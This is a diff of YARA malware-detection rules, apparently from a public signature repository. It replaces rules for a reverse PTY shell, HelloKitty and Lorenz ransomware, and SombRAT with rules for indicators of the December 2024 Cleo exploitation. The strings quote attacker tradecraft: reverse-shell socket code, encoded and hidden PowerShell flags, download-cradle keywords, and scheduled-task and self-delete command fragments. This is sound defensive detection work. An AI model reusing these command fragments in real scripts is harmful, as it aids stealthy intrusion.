+		logic_hash = "d56d97b4f0506430f21ccb029524111c404c03f8cef25710b96c6c0915fdcf22"
+		score = 60
+		quality = 31
+		tags = "HIGHVOL, FILE"
 
 	strings:
-		$s1 = ".newelf.elf.text" ascii
-		$s2 = ".newelf.elf.libc.so.data" ascii
-		$s3 = ".newelf.elf.Initial.stack" ascii
-		$s4 = ".newelf.elf.libevlog.so.data" ascii
+		$sa1 = " -enc " ascii wide nocase
+		$sa2 = " -EncodedCommand " ascii wide nocase
+		$sa3 = " /enc " ascii wide nocase
+		$sa4 = " /EncodedCommand " ascii wide nocase
+		$sb1 = " -w hidden " ascii wide nocase
+		$sb2 = " -window hidden " ascii wide nocase
+		$sb3 = " -windowstyle hidden " ascii wide nocase
+		$sb4 = " /w hidden " ascii wide nocase
+		$sb5 = " /window hidden " ascii wide nocase
+		$sb6 = " /windowstyle hidden " ascii wide nocase
+		$sc1 = " -nop " ascii wide nocase
+		$sc2 = " -noprofile " ascii wide nocase
+		$sc3 = " /nop " ascii wide nocase
+		$sc4 = " /noprofile " ascii wide nocase
+		$sd1 = " -noni " ascii wide nocase
+		$sd2 = " -noninteractive " ascii wide nocase
+		$sd3 = " /noni " ascii wide nocase
+		$sd4 = " /noninteractive " ascii wide nocase
+		$se1 = " -ep bypass " ascii wide nocase
+		$se2 = " -exec bypass " ascii wide nocase
+		$se3 = " -executionpolicy bypass " ascii wide nocase
+		$se4 = " -exec bypass " ascii wide nocase
+		$se5 = " /ep bypass " ascii wide nocase
+		$se6 = " /exec bypass " ascii wide nocase
+		$se7 = " /executionpolicy bypass " ascii wide nocase
+		$se8 = " /exec bypass " ascii wide nocase
+		$sf1 = " -sta " ascii wide
+		$sf2 = " /sta " ascii wide
+		$fp1 = "Chocolatey Software" ascii wide
+		$fp2 = "VBOX_MSI_INSTALL_PATH" ascii wide
+		$fp3 = "\\Local\\Temp\\en-US.ps1" ascii wide
+		$fp4 = "Lenovo Vantage - Battery Gauge Helper" wide fullword
+		$fp5 = "\\LastPass\\lpwinmetro\\AppxUpgradeUwp.ps1" ascii
+		$fp6 = "# use the encoded form to mitigate quoting complications that full scriptblock transfer exposes" ascii
+		$fp7 = "Write-AnsibleLog \"INFO - s" ascii
+		$fp8 = "\\Packages\\Matrix42\\" ascii
+		$fp9 = "echo " ascii
+		$fp10 = "install" ascii fullword
+		$fp11 = "REM " ascii
+		$fp12 = "set /p " ascii
+		$fp13 = "rxScan Application" wide
+		$fpa1 = "All Rights"
+		$fpa2 = "<html"
+		$fpa2b = "<HTML"
+		$fpa3 = "Copyright"
+		$fpa4 = "License"
+		$fpa5 = "<?xml"
+		$fpa6 = "Help" fullword
+		$fpa7 = "COPYRIGHT"
 
 	condition:
-		filesize < 5MB and 2 of them or all of them
+		filesize < 3000KB and 4 of ( $s* ) and not 1 of ( $fp* ) and uint32be( 0 ) != 0x456C6646
 }
-rule SIGNATURE_BASE_HKTL_Reverse_Connect_TCP_PTY_Shell : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_Log_Indicators_Dec24 : SCRIPT
 {
 	meta:
-		description = "Detects reverse connect TCP PTY shell"
-		author = "Jeff Beley"
-		id = "a9a90d67-774b-5b32-97c0-d7e06763f2e9"
-		date = "2019-10-19"
-		modified = "2023-12-05"
-		reference = "https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_pty_shell.yar#L1-L16"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "385042a9-fc8c-5b50-975f-3436a16e6861"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b92077f9ff775ae3f8166f47a32aaa872fcbf7fcefc3789e5411388aac5403a"
+		logic_hash = "a7e6713a08d7cce00cffba8daa12b251ccc12dc8d5a5f38d568bd5054e3783a2"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "cae9833292d3013774bdc689d4471fd38e4a80d2d407adf9fa99bc8cde3319bf"
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "os.dup2(s.fileno(),1)" fullword ascii
-		$s2 = "pty.spawn(\"/bin/\")" fullword ascii
-		$s3 = "os.putenv(\"HISTFILE\",'/dev/null')" fullword ascii
-		$s4 = "socket.socket(socket.AF_INET, socket.SOCK_STREAM)" fullword ascii
+		$x1 = "Note: Processing autorun file 'autorun\\health" ascii wide
+		$x2 = "60282967-dc91-40ef-a34c-38e992509c2c.xml" ascii wide
+		$x3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
 
 	condition:
-		filesize < 1KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_SOMBRAT_May21_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_1 : FILE
 {
 	meta:
-		description = "Detects SombRAT samples from UNC2447 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "78b46bed-4fd4-596f-bba7-12243f467af3"
-		date = "2021-05-01"
-		modified = "2023-01-07"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L2-L36"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "81daf184-4c38-5d84-899b-9d0de2f39934"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L18-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f2572745cbd68c5f2be5c64b160d2513938daba6da57523012491acc63cfee4"
+		logic_hash = "481ddd570d0292036b421223ce0f839ece86cc1a97aa226a8b9fbd1d63905d1b"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "61e286c62e556ac79b01c17357176e58efb67d86c5d17407e128094c3151f7f9"
-		hash2 = "99baffcd7a6b939b72c99af7c1e88523a50053ab966a079d9bf268aff884426e"
+		hash1 = "786951478a0fc5db24f6e1d8dcc5eaa8880dbd928da97828a61f1f1f0f21e21d"
 
 	strings:
-		$x1 = "~arungvc" ascii fullword
-		$s1 = "plugin64_" ascii
-		$s2 = "0xUnknown" ascii fullword
-		$s3 = "b%x.%s" ascii fullword
-		$s4 = "/news" ascii
-		$sc1 = { 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 73
-               00 2E 00 65 00 78 00 65 00 00 00 00 00 00 00 00
-               00 49 73 57 6F 77 36 34 50 72 6F 63 65 73 73 00
-               00 6B 00 65 00 72 00 6E 00 65 00 6C 00 33 00 32
-               00 00 00 00 00 00 00 00 00 47 00 6C 00 6F 00 62
-               00 61 00 6C 00 5C 00 25 00 73 }
-		$op1 = { 66 90 0f b6 45 80 32 44 0d 81 34 de 88 44 0d 81 48 ff c1 48 83 f9 19 72 e9 }
-		$op2 = { 48 8b d0 66 0f 6f 05 ?1 ?? 0? 00 f3 0f 7f 44 24 68 66 89 7c 24 58 41 b8 10 00 00 00 4c 39 40 10 4c 0f 42 40 10 48 83 78 18 08 }
-		$op3 = { 49 f7 b0 a0 00 00 00 42 0f b6 04 0a 41 30 44 33 fe 48 83 79 18 10 72 03 48 8b 09 33 d2 b8 05 00 00 00 }
+		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
+		$sa2 = "<Mark date=" ascii
+		$sa3 = "<Event>" ascii
+		$sa4 = "<Command text" ascii
+		$sb1 = "[System.Net.WebRequest]::create" ascii
+		$sb2 = "Invoke-RestMethod" ascii
+		$sb3 = "Invoke-WebRequest" ascii
+		$sb4 = "iwr " ascii
+		$sb5 = "Net.WebClient" ascii
+		$sb6 = "Resume-BitsTransfer" ascii
+		$sb7 = "Start-BitsTransfer" ascii
+		$sb8 = "wget " ascii
+		$sb9 = "WinHttp.WinHttpRequest" ascii
+		$sb10 = ".DownloadFile(" ascii
+		$sb11 = ".DownloadString(" ascii
+		$sb12 = "Bypass" nocase ascii
+		$sb13 = "-EncodedCommand" ascii
+		$sb14 = "-windowstyle hidden" ascii
+		$sb15 = " -enc " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them ) or 5 of them
+		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c84b2430-dcf1-5a80-96a0-02d292ea386b"
-		date = "2021-05-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L38-L72"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "d215d4a0-1726-58d4-90df-8ec6102effe1"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L54-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "acc0ab5502d53c6e22c8650c29c5459a6106f33c398e4efcd963f54971a0c870"
-		score = 75
+		logic_hash = "8debaf2c85ea63501b7a3c2ff8af7a8484f4d6097e073645d808cbd50ef1511a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851"
-		hash2 = "0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c"
-		hash3 = "52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a"
-		hash4 = "7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06"
-		hash5 = "947e357bfdfe411be6c97af6559fd1cdc5c9d6f5cea122bf174d124ee03d2de8"
-		hash6 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
-		hash7 = "a147945635d5bd0fa832c9b55bc3ebcea7a7787e8f89b98a44279f8eddda2a77"
-		hash8 = "bade05a30aba181ffbe4325c1ba6c76ef9e02cbe41a4190bd3671152c51c4a7b"
-		hash9 = "c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323"
-		hash10 = "dc007e71085297883ca68a919e37687427b7e6db0c24ca014c148f226d8dd98f"
-		hash11 = "ef614b456ca4eaa8156a895f450577600ad41bd553b4512ae6abf3fb8b5eb04e"
 
 	strings:
-		$xop1 = { 8b 45 08 8b 75 f4 fe 85 f7 fd ff ff 0f 11 44 05 b4 83 c0 10 89 45 08 83 f8 30 7c 82 }
-		$xop2 = { 81 c3 dc a9 b0 5c c1 c9 0b 33 c8 89 55 a0 8b c7 8b 7d e0 c1 c8 06 33 f7 }
-		$s1 = "select * from Win32_ShadowCopy" wide fullword
-		$s2 = "bootfont.bin" wide fullword
-		$s3 = "DECRYPT_NOTE.txt" wide fullword
-		$s4 = ".onion" wide
-		$sop1 = { 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 0f 11 45 ec }
-		$sop2 = { 56 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 }
-		$sop3 = { 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 }
+		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
+		$sa2 = "<Mark date=" ascii
+		$sa3 = "<Event>" ascii
+		$sa4 = "<Command text" ascii
+		$sb1 = "wscript" ascii
+		$sb2 = "cscript" ascii
+		$sb3 = "mshta" ascii
+		$sb4 = "certutil" ascii
+		$sb5 = "pwsh" ascii
+		$sb6 = "curl" ascii
+		$sb7 = "msiexec" ascii
+		$sb8 = "taskkill" ascii
+		$sb9 = "regsvr32" ascii
+		$sb10 = "rundll32" ascii
+		$sb11 = "bitsadmin" ascii
+		$sb12 = "whoami" ascii
+		$sb13 = "bcdedit" ascii
+		$sb14 = "systeminfo" ascii
+		$sb15 = "reg " ascii
+		$sb16 = "schtasks" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of ( $x* ) or 3 of them
+		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_2 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_XML_Indicators_Dec24 : FILE
 {
 	meta:
-		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "82aaabc6-102a-512e-8c2a-4d6fda864c68"
-		date = "2021-05-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L74-L99"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "622633af-aa7a-5bf9-a59c-6590535d86a4"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L91-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1eee3a00ab3f70425d2b6bf5dc507155bf504b851ddb6515602d83d8b6a254b8"
-		score = 75
+		logic_hash = "21c11c3e0c0ffea89e24b9c002b6112a46b4dc7c2c4f1f5dc9803758a68efc36"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768"
-		hash2 = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9"
-		hash3 = "501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe"
-		hash4 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
 
 	strings:
-		$xop1 = { 50 8d 45 f8 50 ff 75 fc ff 15 ?? ?? 42 00 3d ea 00 00 00 75 18 83 7d f8 00 }
-		$s1 = "HelloKittyMutex" wide
-		$s2 = "%s\\read_me_lkd.txt" wide fullword
-		$s3 = "/C ping 127.0.0.1 & del %s" wide fullword
-		$s4 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword
-		$sop1 = { 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc ff 15 ?? ?? 42 00 }
-		$sop2 = { 74 12 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc }
+		$x1 = "<Host alias=\"60282967-dc91-40ef-a34c-38e992509c2c\" application=\"\" " ascii
+		$s1 = "<Commands>SYSTEM cmd.exe /c " ascii
+		$a1 = "<Action actiontype=\"Commands\" " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) or 2 of them
+		filesize < 50KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_PS1_WARPRISM_May21_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_1 : FILE
 {
 	meta:
-		description = "Detects WARPRISM PowerShell samples from UNC2447 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fa389a45-3b31-5a84-9882-49fd6ee8cac5"
-		date = "2021-05-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L101-L119"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "b30ca09f-b84c-5de8-9bf7-9f3269f32c1f"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L112-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "09abac2be0f12d31dabfdae9e8a148a28887a2a5df003c7bcb56ba45f1c6a62c"
-		score = 75
-		quality = 85
+		logic_hash = "c9be15aec57fdde62815ee04daa5616940ab7949784d382a4825dce9f1e28568"
+		score = 70
+		quality = 83
 		tags = "FILE"
-		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
-		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
-		hash3 = "b41a303a4caa71fa260dd601a796033d8bfebcaa6bd9dfd7ad956fac5229a735"
+		hash1 = "b103f708e85416fc6d7af9605da4b57b3abe42fb9c6c9ec0f539b4c877580bd2"
 
 	strings:
-		$x1 = "if ($MyInvocation.MyCommand.Path -match '\\S') {" ascii fullword
-		$s1 = "[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr " ascii wide
-		$s2 = "[Runtime.InteropServices.Marshal]::Copy($" ascii wide
-		$s3 = "[System.Diagnostics.Process]::Start((-join(" ascii wide
+		$sa1 = "<Action actiontype=\"Commands\"" ascii
+		$sa2 = "<?xml version=" ascii
+		$sa3 = "<Runninglocalrequired>" ascii
+		$sa4 = "<Autostartup>" ascii
+		$sb1 = "[System.Net.WebRequest]::create" ascii
+		$sb2 = "Invoke-RestMethod" ascii
+		$sb3 = "Invoke-WebRequest" ascii
+		$sb4 = "iwr " ascii
+		$sb5 = "Net.WebClient" ascii
+		$sb6 = "Resume-BitsTransfer" ascii
+		$sb7 = "Start-BitsTransfer" ascii
+		$sb8 = "wget " ascii
+		$sb9 = "WinHttp.WinHttpRequest" ascii
+		$sb10 = ".DownloadFile(" ascii
+		$sb11 = ".DownloadString(" ascii
+		$sb12 = "Bypass" nocase ascii
+		$sb13 = "-EncodedCommand" ascii
+		$sb14 = "-windowstyle hidden" ascii
+		$sb15 = " -enc " ascii
 
 	condition:
-		filesize < 5000KB and 1 of ( $x* ) or 2 of them
+		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_APT_UNC2447_BAT_Runner_May21_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects Batch script runners from UNC2447 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0bacd4f7-421a-570f-9f74-5a19ab806dd0"
-		date = "2021-05-01"
-		modified = "2023-01-07"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc2447_sombrat.yar#L121-L135"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "a71c71f3-d36f-5c27-b150-e678bccf2dba"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L148-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9872327f648e4421aa40ca3ce55df5d3eb5e8c5bc718ff62a3d4adac79217eb"
-		score = 75
+		logic_hash = "60e53c8d99fde8c48bff67408605aa69c3c1fe3040ba4f9d2080980df970aa93"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "ccacf4658ae778d02e4e55cd161b5a0772eb8b8eee62fed34e2d8f11db2cc4bc"
 
 	strings:
-		$x1 = "powershell.exe -c \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::" ascii
-		$x2 = "wwansvc.txt')))\" | powershell.exe -" ascii
+		$sa1 = "<Action actiontype=\"Commands\"" ascii
+		$sa2 = "<?xml version=" ascii
+		$sa3 = "<Runninglocalrequired>" ascii
+		$sa4 = "<Autostartup>" ascii
+		$sb1 = "wscript" ascii
+		$sb2 = "cscript" ascii
+		$sb3 = "mshta" ascii
+		$sb4 = "certutil" ascii
+		$sb5 = "pwsh" ascii
+		$sb6 = "curl" ascii
+		$sb7 = "msiexec" ascii
+		$sb8 = "taskkill" ascii
+		$sb9 = "regsvr32" ascii
+		$sb10 = "rundll32" ascii
+		$sb11 = "bitsadmin" ascii
+		$sb12 = "whoami" ascii
+		$sb13 = "bcdedit" ascii
+		$sb14 = "systeminfo" ascii
+		$sb15 = "reg " ascii
+		$sb16 = "schtasks" ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_Gen_Python_Encoded_Adware : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_PS1_Indicators_Dec24 : SCRIPT
 {
 	meta:
-		description = "Encoded Python payload for adware"
-		author = "John Lambert @JohnLaTwC"
-		id = "7b4b422b-c960-5ab3-a6a7-a30e416efdec"
-		date = "2018-03-07"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/JohnLaTwC/status/949048002466914304"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_encoded_adware.yar#L1-L22"
+		description = "Detects encoded and decoded PowerShell loader used during Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "491cda57-0ad0-5ddc-90cb-48411eef2f2e"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L185-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5d7239be779367e69d2e63ffd9dc6e2a1f79c4e5c6c725e8c5e59a44c0ab2fff"
-		logic_hash = "256b289cfe83384c02aacf9c7e790898ba34988c9be149b39e63791c319bfc4a"
+		logic_hash = "87dcd0aa3c16d8948514b1d8589d38c6cc73bf7e6262f4517659cead16fedd3d"
 		score = 75
 		quality = 85
+		tags = "SCRIPT"
+
+	strings:
+		$xe1 = "Start-Process -WindowStyle Hidden -FilePath jre\\bin\\java.exe" base64 ascii wide
+		$xe2 = "$f=\"cleo." base64 ascii wide
+		$xe3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " base64 ascii wide
+		$x1 = "$f=\"cleo." ascii wide
+		$x2 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
+
+	condition:
+		1 of them
+}
+rule SIGNATURE_BASE_SUSP_EXPL_JAR_Indicators_Dec24 : FILE
+{
+	meta:
+		description = "Detects characteristics of JAR files used during Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "4e8f6aa8-9efd-5fcf-b795-5042d4ba1708"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L204-L222"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "8b87e7000ab5d9759f55660a085bf0f3dddb46ad1ea411cbbabce1000105ee9e"
+		score = 70
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$r1 = "=__import__(\"base64\").b64decode"
-		$s1 = "bytes(map(lambda"
-		$s2 = "[1]^"
+		$s1 = "TLS v3 " ascii
+		$s2 = "java/util/Base64$Decoder" ascii
+		$s3 = "AES/CBC/NoPadding" ascii
+		$s4 = "getenv" ascii
+		$s5 = "ava/util/zip/ZipInputStream" ascii
 
 	condition:
-		filesize < 100KB and @r1 < 100 and all of them
+		uint16( 0 ) == 0xfeca and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lorenz_May21_1 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_JAVA_Payloads_Dec24_1_1 : FILE
 {
 	meta:
-		description = "Detects Lorenz Ransomware samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b18a4a3-82da-574b-8d10-daf2176448b9"
-		date = "2021-05-04"
-		modified = "2023-12-05"
-		reference = "Internal Research - DACH TE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_lorenz.yar#L1-L28"
+		description = "Detects characteristics of JAVA files used during Cleo software exploitation (as reported by Huntress in December 2024) - files Cli, ScSlot, Slot, SrvSlot"
+		author = "Florian Roth"
+		id = "2940ddad-3dba-594a-9111-e4741d6ff39b"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cleo_dec24.yar#L224-L245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aec940deb2c3bc099a50a2e8f014ae425d306d331078d9ac2abc2ec7b8bf572e"
+		logic_hash = "85600e9310e502b3b2135f2f3cf698ae54fe362047cdf9d378dcc107e0c2fa18"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999"
-		hash2 = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1"
-		hash3 = "c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb"
+		hash1 = "0c57b317b572d071afd8ccdb844dd6f117e20f818c6031d7ba8adcbd32be0617"
 
 	strings:
-		$x1 = "process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON " ascii fullword
-		$x2 = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK" ascii fullword
-		$s1 = "process call create \"cmd.exe /c schtasks /Create /F " ascii fullword
-		$s2 = "twr.ini" ascii fullword
-		$s3 = "/c wmic /node:'" ascii fullword
-		$op1 = { 0f 4f d9 81 ff dc 0f 00 00 5f 8d 4b 0? 0f 4e cb 83 fe 3c 5e 5b }
-		$op2 = { 6a 02 e8 ?? ?? 0? 00 83 c4 18 83 f8 01 75 01 cc 6a 00 68 ?? ?? 00 00 }
+		$a1 = "java/lang/StringBuffer"
+		$x1 = "Start-Sleep 3;del " ascii
+		$x2 = "sleep 3;rm -f '" ascii
+		$x3 = "powershell -Noninteractive -EncodedCommand " ascii
+		$x4 = "runDelFileCmd" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 1 of ( $x* ) or all of ( $op* ) or 3 of them )
